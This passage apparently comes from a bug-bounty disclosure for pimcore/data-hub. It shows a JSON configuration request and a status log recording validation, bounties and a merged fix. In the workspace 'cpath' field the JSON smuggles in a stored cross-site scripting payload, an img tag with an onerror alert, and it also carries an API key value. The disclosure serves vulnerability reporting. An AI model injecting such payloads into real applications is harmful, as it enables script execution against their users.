Vincent & Grenadines","value":"VC"},{"key":"Sudan","value":"SD"},{"key":"Suriname","value":"SR"},{"key":"Svalbard and Jan Mayen","value":"SJ"},{"key":"Swaziland","value":"SZ"},{"key":"Sweden","value":"SE"},{"key":"Switzerland","value":"CH"},{"key":"Syria","value":"SY"},{"key":"São Tomé and Príncipe","value":"ST"},{"key":"Taiwan","value":"TW"},{"key":"Tanzania","value":"TZ"},{"key":"Thailand","value":"TH"},{"key":"Timor-Leste","value":"TL"},{"key":"Togo","value":"TG"},{"key":"Tokelau","value":"TK"},{"key":"Tonga","value":"TO"},{"key":"Trinidad and Tobago","value":"TT"},{"key":"Tunisia","value":"TN"},{"key":"Turkey","value":"TR"},{"key":"Turks and Caicos Islands","value":"TC"},{"key":"Tuvalu","value":"TV"},{"key":"U.S. Outlying Islands","value":"UM"},{"key":"U.S. Virgin Islands","value":"VI"},{"key":"Uganda","value":"UG"},{"key":"Ukraine","value":"UA"},{"key":"United Arab Emirates","value":"AE"},{"key":"United Kingdom","value":"GB"},{"key":"United States","value":"US"},{"key":"Uruguay","value":"UY"},{"key":"Uzbekistan","value":"UZ"},{"key":"Vanuatu","value":"VU"},{"key":"Venezuela","value":"VE"},{"key":"Vietnam","value":"VN"},{"key":"Wallis and Futuna","value":"WF"},{"key":"Western Sahara","value":"EH"},{"key":"Yemen","value":"YE"},{"key":"Zambia","value":"ZM"},{"key":"Zimbabwe","value":"ZW"},{"key":"Åland 
Islands","value":"AX"}],"width":"","defaultValue":null,"optionsProviderClass":null,"optionsProviderData":null,"queryColumnType":"varchar","columnType":"varchar","columnLength":"190","phpdocType":"string","dynamicOptions":false,"name":"countryCode","title":"Country","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false},{"attributes":{"attribute":"phone","label":"phone","dataType":"input","layout":{"fieldtype":"input","width":400,"queryColumnType":"varchar","columnType":"varchar","columnLength":190,"phpdocType":"string","regex":"","unique":false,"showCharCount":null,"name":"phone","title":"phone","tooltip":"","mandatory":false,"noteditable":false,"index":false,"locked":false,"style":"","permissions":null,"datatype":"data","relationType":false,"invisible":false,"visibleGridView":false,"visibleSearch":false}},"isOperator":false}]}}],"mutationEntities":[],"specialEntities":[{"name":"document","readPossible":true,"createPossible":true,"updatePossible":true,"deletePossible":true,"readAllowed":false,"createAllowed":false,"updateAllowed":false,"deleteAllowed":false,"id":"extModel365-1"},{"name":"document_folder","readPossible":true,"createPossible":false,"updatePossible":false,"deletePossible":true,"readAllowed":false,"createAllowed":false,"updateAllowed":false,"deleteAllowed":false,"id":"extModel365-2"},{"name":"asset","readPossible":true,"createPossible":true,"updatePossible":true,"deletePossible":true,"readAllowed":true,"createAllowed":false,"updateAllowed":false,"deleteAllowed":false,"id":"extModel365-3"},{"name":"asset_folder","readPossible":true,"createPossible":true,"updatePossible":true,"deletePossible":true,"readAllowed":true,"createAllowed":false,"updateAllowed":false,"deleteAllowed":false,"id":"extModel365-4"},{"name":"asset_listing","readPossible":true,"createPossible":true,"updatePoss
ible":true,"deletePossible":true,"readAllowed":false,"createAllowed":false,"updateAllowed":false,"deleteAllowed":false,"id":"extModel365-5"},{"name":"object_folder","readPossible":true,"createPossible":true,"updatePossible":true,"deletePossible":true,"readAllowed":true,"createAllowed":false,"updateAllowed":false,"deleteAllowed":false,"id":"extModel365-6"}]},"security":{"method":"datahub_apikey","apikey":"295b86489dca91a4aafaac8315cdb84a","skipPermissionCheck":false},"workspaces":{"asset":[{"read":true,"cpath":"/Car Images","create":false,"update":false,"delete":false,"id":"extModel16109-2"},{"read":true,"cpath":"/Brand Logos","create":false,"update":false,"delete":false,"id":"extModel16109-1"}],"document":[{"read":true,"cpath":"<img/src/onerror=alert('xss')>","create":false,"update":false,"delete":false,"id":"extModel412-1"}],"object":[{"read":true,"cpath":"/Shop","create":false,"update":false,"delete":false,"id":"extModel16141-1"}]},"permissions":{"user":[],"role":[]}}
We are processing your report and will contact the pimcore/data-hub team within 24 hours. 4 months ago
We have contacted a member of the pimcore/data-hub team and are waiting to hear back 4 months ago
Divesh Pahuja validated this vulnerability 4 months ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
Divesh Pahuja confirmed that a fix has been merged on 6a85b7 4 months ago
Divesh Pahuja has been awarded the fix bounty